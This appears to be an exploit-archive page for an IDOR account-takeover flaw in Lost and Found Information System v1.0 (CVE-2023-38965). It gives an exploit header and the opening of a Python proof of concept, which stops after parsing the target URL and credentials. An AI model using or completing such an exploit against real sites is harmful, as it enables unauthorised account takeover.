Lost and found information system v1.0 ( idor ) leads to account take over Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-02-13 |
Type : webapps |
Platform : php
This exploit / vulnerability Lost and found information system v1.0 ( idor ) leads to account take over is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over
# Date: 2023-12-03
# Exploit Author: OR4NG.M4N
# Category : webapps
# CVE : CVE-2023-38965
Python p0c :
import argparse
import requests
import time
parser = argparse.ArgumentParser(description='Send a POST request to the target server')
parser.add_argument('-url', help='URL of the target', required=True)
parser.add_argument('-user', help='Username', required=True)
parser.add_argument('-password', help='Password', required=True)
args = parser.parse_args()